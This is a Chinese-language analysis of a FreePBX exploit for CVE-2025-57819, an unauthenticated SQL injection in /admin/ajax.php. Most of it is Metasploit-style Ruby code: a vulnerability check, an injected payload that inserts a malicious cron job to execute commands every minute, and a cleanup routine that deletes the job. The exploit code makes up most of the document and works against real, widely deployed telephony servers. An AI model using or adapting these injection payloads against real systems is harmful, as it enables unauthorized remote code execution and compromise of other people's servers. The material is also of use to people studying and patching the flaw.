FreePBX ajax.php未授权SQL注入到远程代码执行漏洞利用分析

漏洞概述

该漏洞影响FreePBX 15.0.66、16.0.89和17.0.3之前的版本，存在于/admin/ajax.php端点，无需认证即可利用。攻击者可通过SQL注入漏洞向数据库插入恶意cronjob任务，从而实现远程代码执行。

技术细节

漏洞检测

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


def check
  print_status('Checking if vulnerable...')
  
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
    'vars_get' => {
      'module' => 'FreePBX\\modules\\endpoint\\ajax',
      'command' => 'model',
      'template' => Rex::Text.rand_text_alphanumeric(3..6),
      'model' => Rex::Text.rand_text_alphanumeric(3..6),
      'brand' => "#{Rex::Text.rand_text_alphanumeric(3..6)}'"
    }
  )

  if res&.code == 500 && res.body =~ /You have an error in your SQL syntax/
    return Exploit::CheckCode::Vulnerable('Detected SQL injection')
  end

  Exploit::CheckCode::Safe('No SQL injection detected, target is patched')
end

漏洞利用

利用SQL注入向cron_jobs表插入恶意任务：

1
2
3


rce_payload = Rex::Text.rand_text_alpha(4..7)
rce_payload << "';INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)"
rce_payload << " VALUES ('#{module_name}','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1) -- "

清理机制

模块包含自动清理功能，利用完成后删除创建的cronjob：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


def cleanup
  super
  return unless @job_name
  
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
    'vars_get' => {
      'module' => 'FreePBX\\modules\\endpoint\\ajax',
      'command' => 'model',
      'template' => Rex::Text.rand_text_alphanumeric(3..6),
      'model' => Rex::Text.rand_text_alphanumeric(3..6),
      'brand' => "'; DELETE FROM cron_jobs WHERE jobname=\'#{@job_name}\' -- "
    }
  )
end

影响版本

FreePBX < 15.0.66
FreePBX < 16.0.89
FreePBX < 17.0.3

参考信息

CVE编号：CVE-2025-57819
CVSS评分：10.0
披露日期：2025-08-28